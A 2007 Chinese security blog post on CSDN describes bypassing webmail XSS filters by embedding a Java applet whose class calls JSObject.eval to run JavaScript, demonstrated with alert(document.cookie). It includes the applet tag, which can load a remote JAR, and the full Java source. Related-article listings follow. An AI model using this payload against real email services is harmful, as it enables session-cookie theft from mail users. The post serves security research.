APPLET AND XSS THE MAIL

最新推荐文章于 2024-07-10 14:03:37 发布
最新推荐文章于 2024-07-10 14:03:37 发布
阅读量2.8k 收藏
点赞数
文章标签: applet archive import exception layout javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_S_T_O/article/details/1916900
版权

AUTHOR : KJ021320
TEAM : I.S.T.O
BLOG : blog.csdn.net/kj021320


在APPLET中其实可以运行JAVASCRIPT 而 JS中又可以获取COOKIE,添加IFRAME等
然而我们就可以采用这样的方式绕过某些过滤器去XSS EMAIL了!
晚饭的时候跟 刺他们讨论了一下~~偶感觉局限性很大 所以扔出来 抛砖引玉看看有没有人可以有更好的利用方式
1。首先EMAIL语法分析器不过滤 <applet 标签
2。被攻击者有安装JRE 能运行APPLET
似乎有点难! -_- 像HOTMAIL YAHOO GMAIL那些都过滤了APPLET

现在开始我们的方案

首先是 applet标签
<applet code="cn.isto.XSSJApplet" width=350 height=200 codebase="" archive="JavaAppletXss.jar" name="xss"></applet>
一般是这样的!
archive的位置是加载的JAR 这里幸好可以调用远程的连接
也就是这样可以实现
<applet code="cn.isto.XSSJApplet" width=350 height=200 codebase="" archive="http://istoweb/JavaAppletXss.jar" name="xss"></applet>  

OK 现在来构造我们的XSSJApplet 类

/*
 * XSSJApplet.java
 * Created on 2007年12月4日, 下午3:40
 */
package cn.isto;
import java.applet.AppletContext;
import java.io.OutputStream;
import java.net.*;
import netscape.javascript.*;
/**
 * @author  kj021320
 */
public class XSSJApplet extends javax.swing.JApplet {
   
    /** Initializes the applet XSSJApplet */
    public void init() {
        URL attackUrl;
        AppletContext at;
        URLConnection uc;
        try {
            initComponents();
     //调用JSObject 对象来直接执行 JS代码
            JSObject.getWindow(this).eval("alert(document.cookie)");
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }
    private void initComponents() {
        jLabelTitle = new javax.swing.JLabel();
        jLabelTitle.setText("kj021320[I.S.T.O] XSS APPLET");
        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addGap(21, 21, 21)
                .addComponent(jLabelTitle, javax.swing.GroupLayout.PREFERRED_SIZE, 180, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addContainerGap(29, Short.MAX_VALUE))
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addGap(26, 26, 26)
                .addComponent(jLabelTitle)
                .addContainerGap(111, Short.MAX_VALUE))
        );
    }
    private javax.swing.JLabel jLabelTitle;
}

全文完
  

I_S_T_O
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JChemPaint Applet and Swing Application-开源
04-28
JChemPaint Applet和Swing应用程序是Java程序,用于绘制2D化学结构,就像大多数化学教科书中的结构一样。 它基于化学开发工具包(cdk.sf.net)。 可在http://jchempaint.github.com上找到下载,跟踪器和源代码存储库
The Photomaniac Gallery Applet-开源
05-10
《The Photomaniac Gallery Applet - 开源图像浏览解决方案》 在信息技术领域,开源软件已经成为推动创新的重要力量。今天我们将深入探讨一个名为"The Photomaniac Gallery Applet"的开源项目,它是一款专为查看GIF...
XSS攻击与防御
鹤啸九天
08-13 281
一、概念: XSS:跨站脚本攻击(英文全称:Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中,比如HTML代码和客户端脚本如Javascript中。从效果和稳定...
【web-攻击用户】(9.1.5)查找并利用XSS漏洞--存储型
08-27 700
【查找并利用XSS漏洞】存储型
XSS插入绕过一些方式总结
热门推荐
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
A new way to xss with java applet
阿诺轩
05-16 388
A new way to xss with java applet (很早以前写的文章,拿出来先放个1楼)一、java Applet介绍CVE2012-4681 使我关注到了java applet,简单介绍一下java applet其实类似于FLASH是浏览器一个组件(插件),和微软的ActiveX插件相似。详细的可以参考百度百科: Applet可以翻译为小应用程序,Java Applet就是用Ja
The Zope Weather Applet-开源
04-28
Zope天气小程序允许您直接使用Zope脚本或模板语言来访问NOAA(http://www.noaa.gov)提供的天气信息。 默认情况下,它看起来类似于Gnome Weather Applet
实验八 java小程序Applet
03-13
实验八 java小程序Applet (简述本次实验要求达到的目的,涉及到的相关知识点,实验的具体要求。) 目的: 1.了解java Applet基本框架结构、生命期。 2.了解Applet与HTML网页之间的应用关系。 3.了解HTML向Applet...
Applet and Servlet Communication
11-04
由于Applet的安全模型,直接与服务器通信可能存在安全风险,例如XSS攻击和跨站请求伪造。因此,通常需要对Applet进行签名,确保其可信任,同时在Servlet端进行身份验证和数据校验,以提升安全性。 7. **总结** ...
ES6 新特性有哪些
weixin_64684095的博客
07-06 1157
1. 拥有块级作用域,这意味着在 if 语句、for 循环、while 循环等代码块中声明的 let 变量,只在该代码块内有效。2. 不允许在同一作用域内重复声明同一个变量1. 也具有块级作用域。2. 声明时必须进行初始化赋值,且赋值后不能再重新赋值修改其值。3. 如果 const 声明的是一个对象或数组,虽然不能重新赋值整个对象或数组,但可以修改对象的属性值或数组的元素值。
vue-使用Worker实现多标签页共享一个WebSocket
qq_43548590的博客
07-08 1072
最近有一个需求,需要实现用户系统消息时时提醒功能。第一时间就是想用WebSocket进行长连接。但是前端项目点击跳转需要打开新的标签页。这个时间就会出现新的标签页打开会把老的WebSocket连接挤掉。然后就想到了去共享一个WebSocket连接。就能实现多个标签页消息共享了。
Vue 3集成krpano 全景图展示
Mr丶GUO
07-06 417
Vue 3集成krpano 全景图展示,需要借助官方工具进行制作注意事项:vue@cli3没有static,需要放在public目录下。
lightchart 和百度echarts 有什么区别, 各自优势是什么
huanghm88的专栏
07-08 172
总体而言,Lightchart和百度Echarts都是强大的图表库,选择使用哪个取决于具体的需求和个人偏好。如果您对界面简洁和定制化有较高要求,可以选择Lightchart;社区活跃:百度Echarts拥有广泛的用户群体和开发者社区,用户可以通过社区获取到丰富的文档、教程和示例,解决问题和获取帮助。易于使用:Lightchart提供了方便易用的API和丰富的文档和示例,使用户能够快速上手并灵活使用图表库。成熟稳定:百度Echarts已经发布了多个版本,经过了长时间的发展和优化,具有较高的稳定性和可靠性。
Webkit简介以及工作流程
最新发布
读心悦
07-10 210
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
JS混淆基本类型和原理
朴拙科技的博客
07-06 716
混淆技术为JS代码提供了一定程度的保护,但同时也给代码的维护和逆向工程带来了挑战。了解和掌握这些混淆技术的原理和解析方法,可以帮助开发者更好地保护或理解JS代码。然而,需要注意的是,混淆并不是万无一失的安全措施,它更多的是增加了攻击者理解代码的难度。在进行逆向工程时,应始终遵守法律法规,尊重知识产权,不要用于非法目的。
vue2 、 vue3首屏优化,减少白屏时间
m0_56104994的博客
07-09 201
vue2、vue3首屏优化,减少白屏时间
TS类型声明文件(二)如何在 TS 中导入导出局部类型
weixin_43303603的博客
07-10 146
系列文章之:如何在 TypeScript 中导入导出局部类型
逆向案例十一——华强北登录逆向
m0_57265868的博客
07-10 118
发现有三个参数进行了加密,分别是Password,UserName和Deviceld,再登录一次发现最后一个参数是固定的。这个参数没定义,就去页面源码中,找出这个参数。进入后发现折叠的代码,貌似是des(它自己在上面写的),直接复制。我这是格式化后隐藏了。PS:我之前说第三个参数deviceid是固定,其实是错的,它是由这个函数定义的。这是一个获取设备id的函数,每一台设备都不一样,但同一台设备这个参数是固定的。复制代码在pycharm中的js文件中,最后一个参数是加密的密钥。点击登录,找到登录包。
怎样下载java.applet and java.awt
07-14
您可以按照以下步骤下载和安装Java Applet和Java AWT: 1. 访问Oracle方网站的Java SE下载页面:https://www.oracle.com/java/technologies/javase-jdk11-downloads.html 2. 同意许可协议并选择适合您操作系统的Java开发工具包(JDK)版本。请确保选择的版本包括Java Applet和Java AWT。 3. 下载适合您操作系统的JDK安装程序,并将其保存到您的计算机上。 4. 运行安装程序,并按照提示完成安装过程。在安装期间,您可以选择自定义安装选项,以确保Java Applet和Java AWT被包含在安装中。 5. 安装完成后,您需要配置Java环境变量。在Windows操作系统上,可以按照以下步骤进行配置: - 右键单击“我的电脑”(或“此电脑”),然后选择“属性”。 - 点击“高级系统设置”。 - 在“高级”选项卡下,点击“环境变量”按钮。 - 在“系统变量”部分,找到名为“Path”的变量,然后点击“编辑”。 - 在弹出的对话框中,将Java JDK的安装路径添加到变量值的末尾。例如,如果JDK安装在“C:\Program Files\Java\jdk1.8.0_281”下,则将“;C:\Program Files\Java\jdk1.8.0_281\bin”添加到变量值的末尾。 - 点击“确定”关闭对话框,然后关闭所有打开的对话框。 6. 现在,您已经成功下载和安装了Java Applet和Java AWT,请根据需要使用它们进行开发。 请注意,Java Applet已在Java 11中标记为已弃用,并计划在未来的Java版本中删除。推荐使用其他技术来替代Java Applet,例如JavaFX或Web开发技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值